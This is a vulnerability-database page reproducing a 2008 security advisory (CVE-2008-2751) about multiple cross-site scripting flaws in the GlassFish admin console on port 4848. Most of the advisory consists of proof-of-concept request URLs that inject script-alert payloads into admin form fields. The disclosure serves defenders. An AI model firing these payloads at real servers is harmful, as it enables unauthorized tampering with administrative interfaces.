Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
2008-06-21 / 2008-06-22
Credit:
Eduardo Jorge
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2008-2751
CWE:
CWE-79
CVSS Base Score:
4.3/10
Impact Subscore:
2.9/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
None
Integrity impact:
Partial
Availability impact:
None
============================== Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) ) ============================== Author: Eduardo Neves a.k.a _eth0_ Date: 14 june 2008 Site: http://webappsecurity.wordpress.com ============================== APPLICATION : Glassfish webadmin interface VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs) VENDOR : http://www.sun.com DOWNLOAD : https://glassfish.dev.java.net/ ============================== IMPACT: XSS, XSRF, etc. Severity: Low (or not?) ============================== Descrition: This vulnerability affect some webpages in the glassfish webadmin interface, that vulnerability allow user can insert a malicious or a not expected input data in the input type field.That was found in 10+ input data field in glassfish. This is a vulnerable URL: http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3 Aproper tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyCon tentPage %3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscrip t%3Ealer t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3A property Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealer t%28%27x ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty Sheet%3A propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Eal ert%28%2 7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproper tySheet% 3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%2 7%29%3B% 3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3Aprop ertSecti onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=cus tomresou rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.View State=j_ id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyF orm%3Apr opertyContentPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm %3Aprope rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyCo ntentPag e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscri pt%3Eale rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3 Apropert ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Eale rt%28%27 xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert ySheet%3 ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ea lert%28% 27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aprope rtySheet %3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Eale rt%28%27 xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert ySheet%3 ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27 %29%3B%3 C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3Aprope rtSectio nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyCont entPage% 3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_ hidden&j avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_f ocusElem entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3 Apropert yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyShee t%3Aprop ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3 B%3C%2Fs cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnamePr op%3Anam e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3Aprop ertyShee t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&prop ertyForm %3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3 Ealert%2 8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSe ctionTex tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0% 3Acol2%3 Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Ac ol1St=&p ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=prop ertyForm _hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_Focus Manager_ focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButt on http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3A property ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet %3Agener alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C %2Fscrip t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3 AresType =javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3Ageneral Property Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3 E&proper tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbo x9=true& propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp% 3Ads=8&p ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2= 32&prope rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2 &propert yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&pr opertyFo rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000& property Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&pr opertyFo rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3A basicTab le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3Arow Group1%3 A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3A col3%3Ac ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hi dden=pro pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_u til_Focu sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons% http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3Ap ropertyC ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet% 3Aproper tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&p ropertyF orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName= __CallFl owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp %3Adesc= <script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSe ctionTex tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcreso urcenew. html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id1 85%3Aj_i d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Aprope rtyConte ntPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm %3Aprope rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Ana me=<scri pt>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertyS heet%3Ap ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2') ;</scrip t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTe xtField% 3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertyShe et%3Apro pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');< /script> &propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionText Field%3A descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apr opertSec tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyC ontentPa ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecycle modules. html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id1 17%3Aj_i d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Aprope rtyConte ntPage%3AbottomButtons%3AsaveButton2 http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyF orm%3Apr opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3Aproper tyConten tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>a lert('xs s')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Agenera lPropert ySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyF orm%3Apr opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=< script>a lert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.htm l&proper tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&c om_sun_w ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage %3AtopBu ttons%3AnextButton And others =) -- |_|0|_| Serrano Neves - a.k.a eth0 |_|_|0| http://webappsecurity.wordpress.com |0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds
References:
http://www.securityfocus.com/bid/29751
http://www.securityfocus.com/archive/1/archive/1/493370/100/0/threaded
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top